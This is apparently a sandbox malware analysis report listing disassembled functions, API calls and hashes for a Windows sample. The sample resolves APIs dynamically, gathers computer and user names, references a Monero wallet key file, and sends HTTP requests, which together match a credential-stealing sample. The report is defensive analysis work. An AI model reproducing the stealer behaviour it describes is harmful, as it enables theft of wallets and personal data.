                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A475A
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A4683
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A477B
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A4713
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A473F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A466D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A45E8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A45D2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A4662
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A4617
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A4638
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A4734
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A4678
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A471E
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A4643
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A45C7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A45F3
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A46C2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A45DD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A462D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A474F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A4622
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A4770
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A4729
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A46D8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A46B7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A4765
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A4657
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeapProtectVirtual
                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                              • API String ID: 1542196881-2218711628
                              • Opcode ID: 14d1667ebc26c8cf9a74b28f254ec4278cb141d3748cd9da85b23e7a3b87440c
                              • Instruction ID: d7bf078aaef8b0fdc3039ea299dd465f22ca7d94d2594b4d161ed088869bcc95
                              • Opcode Fuzzy Hash: 14d1667ebc26c8cf9a74b28f254ec4278cb141d3748cd9da85b23e7a3b87440c
                              • Instruction Fuzzy Hash: D141C2707CB688AB8A2CB6A5A84DFDD7A75BB42F00B50505EAC2899380DFB4B9C04519
                              Function 008A4880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 801 8a4880-8a4942 call 8ba7a0 call 8a47b0 call 8ba740 * 5 InternetOpenA StrCmpCA 816 8a494b-8a494f 801->816 817 8a4944 801->817 818 8a4ecb-8a4ef3 InternetCloseHandle call 8baad0 call 8a9ac0 816->818 819 8a4955-8a4acd call 8b8b60 call 8ba920 call 8ba8a0 call 8ba800 * 2 call 8ba9b0 call 8ba8a0 call 8ba800 call 8ba9b0 call 8ba8a0 call 8ba800 call 8ba920 call 8ba8a0 call 8ba800 call 8ba9b0 call 8ba8a0 call 8ba800 call 8ba9b0 call 8ba8a0 call 8ba800 call 8ba9b0 call 8ba920 call 8ba8a0 call 8ba800 * 2 InternetConnectA 816->819 817->816 829 8a4f32-8a4fa2 call 8b8990 * 2 call 8ba7a0 call 8ba800 * 8 818->829 830 8a4ef5-8a4f2d call 8ba820 call 8ba9b0 call 8ba8a0 call 8ba800 818->830 819->818 905 8a4ad3-8a4ad7 819->905 830->829 906 8a4ad9-8a4ae3 905->906 907 8a4ae5 905->907 908 8a4aef-8a4b22 HttpOpenRequestA 906->908 907->908 909 8a4b28-8a4e28 call 8ba9b0 call 8ba8a0 call 8ba800 call 8ba920 call 8ba8a0 call 8ba800 call 8ba9b0 call 8ba8a0 call 8ba800 call 8ba9b0 call 8ba8a0 call 8ba800 call 8ba9b0 call 8ba8a0 call 8ba800 call 8ba9b0 call 8ba8a0 call 8ba800 call 8ba920 call 8ba8a0 call 8ba800 call 8ba9b0 call 8ba8a0 call 8ba800 call 8ba9b0 call 8ba8a0 call 8ba800 call 8ba920 call 8ba8a0 call 8ba800 call 8ba9b0 call 8ba8a0 call 8ba800 call 8ba9b0 call 8ba8a0 call 8ba800 call 8ba9b0 call 8ba8a0 call 8ba800 call 8ba9b0 call 8ba8a0 call 8ba800 call 8ba920 call 8ba8a0 call 8ba800 call 8ba740 call 8ba920 * 2 call 8ba8a0 call 8ba800 * 2 call 8baad0 lstrlen call 8baad0 * 2 lstrlen call 8baad0 HttpSendRequestA 908->909 910 8a4ebe-8a4ec5 InternetCloseHandle 908->910 1021 8a4e32-8a4e5c InternetReadFile 909->1021 910->818 1022 8a4e5e-8a4e65 1021->1022 1023 8a4e67-8a4eb9 InternetCloseHandle call 8ba800 1021->1023 1022->1023 1024 8a4e69-8a4ea7 call 8ba9b0 call 8ba8a0 call 8ba800 1022->1024 1023->910 1024->1021
                              APIs
                                • Part of subcall function 008BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008BA7E6
                                • Part of subcall function 008A47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 008A4839
                                • Part of subcall function 008A47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 008A4849
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 008A4915
                              • StrCmpCA.SHLWAPI(?,0142F028), ref: 008A493A
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 008A4ABA
                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,008C0DDB,00000000,?,?,00000000,?,",00000000,?,0142F0E8), ref: 008A4DE8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 008A4E04
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 008A4E18
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 008A4E49
                              • InternetCloseHandle.WININET(00000000), ref: 008A4EAD
                              • InternetCloseHandle.WININET(00000000), ref: 008A4EC5
                              • HttpOpenRequestA.WININET(00000000,0142F038,?,0142EB78,00000000,00000000,00400100,00000000), ref: 008A4B15
                                • Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01428900,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
                                • Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
                                • Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12
                                • Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905
                                • Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
                                • Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982
                              • InternetCloseHandle.WININET(00000000), ref: 008A4ECF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 460715078-2180234286
                              • Opcode ID: b563f66300a5ee538bf0eae5f9286dae3a4627841b37ec5acd84f8f45d057b69
                              • Instruction ID: 9bd9f07ffeff906c61d7dc39db17ff030d1c55177e09871211852fc89edac548
                              • Opcode Fuzzy Hash: b563f66300a5ee538bf0eae5f9286dae3a4627841b37ec5acd84f8f45d057b69
                              • Instruction Fuzzy Hash: EC12FC71910118AADB19EB94DCA2FEEB738FF14300F5041A9B106A6691EF706F49CF63
                              Function 008B78E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008B7910
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008B7917
                              • GetComputerNameA.KERNEL32(?,00000104), ref: 008B792F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateComputerNameProcess
                              • String ID:
                              • API String ID: 1664310425-0
                              • Opcode ID: abd821a9d3789ad7007a6f2e314d96a48d96fac14e115a704075b626821ddeca
                              • Instruction ID: 83bdfdb157053bc6754a5c7c025fe0be1e1cdaa271e5bd35e7c98785826775c6
                              • Opcode Fuzzy Hash: abd821a9d3789ad7007a6f2e314d96a48d96fac14e115a704075b626821ddeca
                              • Instruction Fuzzy Hash: C70186B1904349EFC710DFD4DD45BAABBB8F744B21F104219F645E7380D77859048BA2
                              Function 008B7850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008A11B7), ref: 008B7880
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008B7887
                              • GetUserNameA.ADVAPI32(00000104,00000104), ref: 008B789F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateNameProcessUser
                              • String ID:
                              • API String ID: 1296208442-0
                              • Opcode ID: 34cdfdabf0c7dcee574f1caa664e21955b0caaf890707170f5c0a7f6ddfbcf5b
                              • Instruction ID: 8777108bf18998cff1506824b63f2da5208ee2aa5b0c4dfaf08d25661a57b6d6
                              • Opcode Fuzzy Hash: 34cdfdabf0c7dcee574f1caa664e21955b0caaf890707170f5c0a7f6ddfbcf5b
                              • Instruction Fuzzy Hash: 88F044B1944648ABC700DFD4DD85BAEBBB8F704711F100159FA15E2780C77425058BA1
                              Function 008A1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitInfoProcessSystem
                              • String ID:
                              • API String ID: 752954902-0
                              • Opcode ID: e5ab345262ca03596d2bbea1648f87e2889ad7293aab8fb259e1c195792ad39d
                              • Instruction ID: dd54886ad99ddc8d94883d237b21920f8e8ff908039e7fbfe7241bbb1b9e7c0f
                              • Opcode Fuzzy Hash: e5ab345262ca03596d2bbea1648f87e2889ad7293aab8fb259e1c195792ad39d
                              • Instruction Fuzzy Hash: 5CD05E7490030CDBCB00DFE0D8896DDBB78FB08312F001554E905A2340EA306482CBA6
                              Function 008B9C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 633 8b9c10-8b9c1a 634 8b9c20-8ba031 GetProcAddress * 43 633->634 635 8ba036-8ba0ca LoadLibraryA * 8 633->635 634->635 636 8ba0cc-8ba141 GetProcAddress * 5 635->636 637 8ba146-8ba14d 635->637 636->637 638 8ba153-8ba211 GetProcAddress * 8 637->638 639 8ba216-8ba21d 637->639 638->639 640 8ba298-8ba29f 639->640 641 8ba21f-8ba293 GetProcAddress * 5 639->641 642 8ba337-8ba33e 640->642 643 8ba2a5-8ba332 GetProcAddress * 6 640->643 641->640 644 8ba41f-8ba426 642->644 645 8ba344-8ba41a GetProcAddress * 9 642->645 643->642 646 8ba428-8ba49d GetProcAddress * 5 644->646 647 8ba4a2-8ba4a9 644->647 645->644 646->647 648 8ba4ab-8ba4d7 GetProcAddress * 2 647->648 649 8ba4dc-8ba4e3 647->649 648->649 650 8ba515-8ba51c 649->650 651 8ba4e5-8ba510 GetProcAddress * 2 649->651 652 8ba612-8ba619 650->652 653 8ba522-8ba60d GetProcAddress * 10 650->653 651->650 654 8ba61b-8ba678 GetProcAddress * 4 652->654 655 8ba67d-8ba684 652->655 653->652 654->655 656 8ba69e-8ba6a5 655->656 657 8ba686-8ba699 GetProcAddress 655->657 658 8ba708-8ba709 656->658 659 8ba6a7-8ba703 GetProcAddress * 4 656->659 657->656 659->658
                              APIs
                              • GetProcAddress.KERNEL32(75900000,01415DE8), ref: 008B9C2D
                              • GetProcAddress.KERNEL32(75900000,01415CC8), ref: 008B9C45
                              • GetProcAddress.KERNEL32(75900000,01428E20), ref: 008B9C5E
                              • GetProcAddress.KERNEL32(75900000,01428DC0), ref: 008B9C76
                              • GetProcAddress.KERNEL32(75900000,0142C9F8), ref: 008B9C8E
                              • GetProcAddress.KERNEL32(75900000,0142CB60), ref: 008B9CA7
                              • GetProcAddress.KERNEL32(75900000,0141AD80), ref: 008B9CBF
                              • GetProcAddress.KERNEL32(75900000,0142C9E0), ref: 008B9CD7
                              • GetProcAddress.KERNEL32(75900000,0142CB30), ref: 008B9CF0
                              • GetProcAddress.KERNEL32(75900000,0142C968), ref: 008B9D08
                              • GetProcAddress.KERNEL32(75900000,0142CAB8), ref: 008B9D20
                              • GetProcAddress.KERNEL32(75900000,01415C08), ref: 008B9D39
                              • GetProcAddress.KERNEL32(75900000,01415BC8), ref: 008B9D51
                              • GetProcAddress.KERNEL32(75900000,01415B68), ref: 008B9D69
                              • GetProcAddress.KERNEL32(75900000,01415CA8), ref: 008B9D82
                              • GetProcAddress.KERNEL32(75900000,0142CB78), ref: 008B9D9A
                              • GetProcAddress.KERNEL32(75900000,0142CC38), ref: 008B9DB2
                              • GetProcAddress.KERNEL32(75900000,0141B118), ref: 008B9DCB
                              • GetProcAddress.KERNEL32(75900000,01415DA8), ref: 008B9DE3
                              • GetProcAddress.KERNEL32(75900000,0142CB48), ref: 008B9DFB
                              • GetProcAddress.KERNEL32(75900000,0142CAA0), ref: 008B9E14
                              • GetProcAddress.KERNEL32(75900000,0142CBA8), ref: 008B9E2C
                              • GetProcAddress.KERNEL32(75900000,0142CBC0), ref: 008B9E44
                              • GetProcAddress.KERNEL32(75900000,01415C28), ref: 008B9E5D
                              • GetProcAddress.KERNEL32(75900000,0142CC50), ref: 008B9E75
                              • GetProcAddress.KERNEL32(75900000,0142CB00), ref: 008B9E8D
                              • GetProcAddress.KERNEL32(75900000,0142CA88), ref: 008B9EA6
                              • GetProcAddress.KERNEL32(75900000,0142CA70), ref: 008B9EBE
                              • GetProcAddress.KERNEL32(75900000,0142CAE8), ref: 008B9ED6
                              • GetProcAddress.KERNEL32(75900000,0142CBF0), ref: 008B9EEF
                              • GetProcAddress.KERNEL32(75900000,0142CA28), ref: 008B9F07
                              • GetProcAddress.KERNEL32(75900000,0142CB90), ref: 008B9F1F
                              • GetProcAddress.KERNEL32(75900000,0142CC20), ref: 008B9F38
                              • GetProcAddress.KERNEL32(75900000,01429DD8), ref: 008B9F50
                              • GetProcAddress.KERNEL32(75900000,0142C980), ref: 008B9F68
                              • GetProcAddress.KERNEL32(75900000,0142C998), ref: 008B9F81
                              • GetProcAddress.KERNEL32(75900000,01415D68), ref: 008B9F99
                              • GetProcAddress.KERNEL32(75900000,0142CA10), ref: 008B9FB1
                              • GetProcAddress.KERNEL32(75900000,01415DC8), ref: 008B9FCA
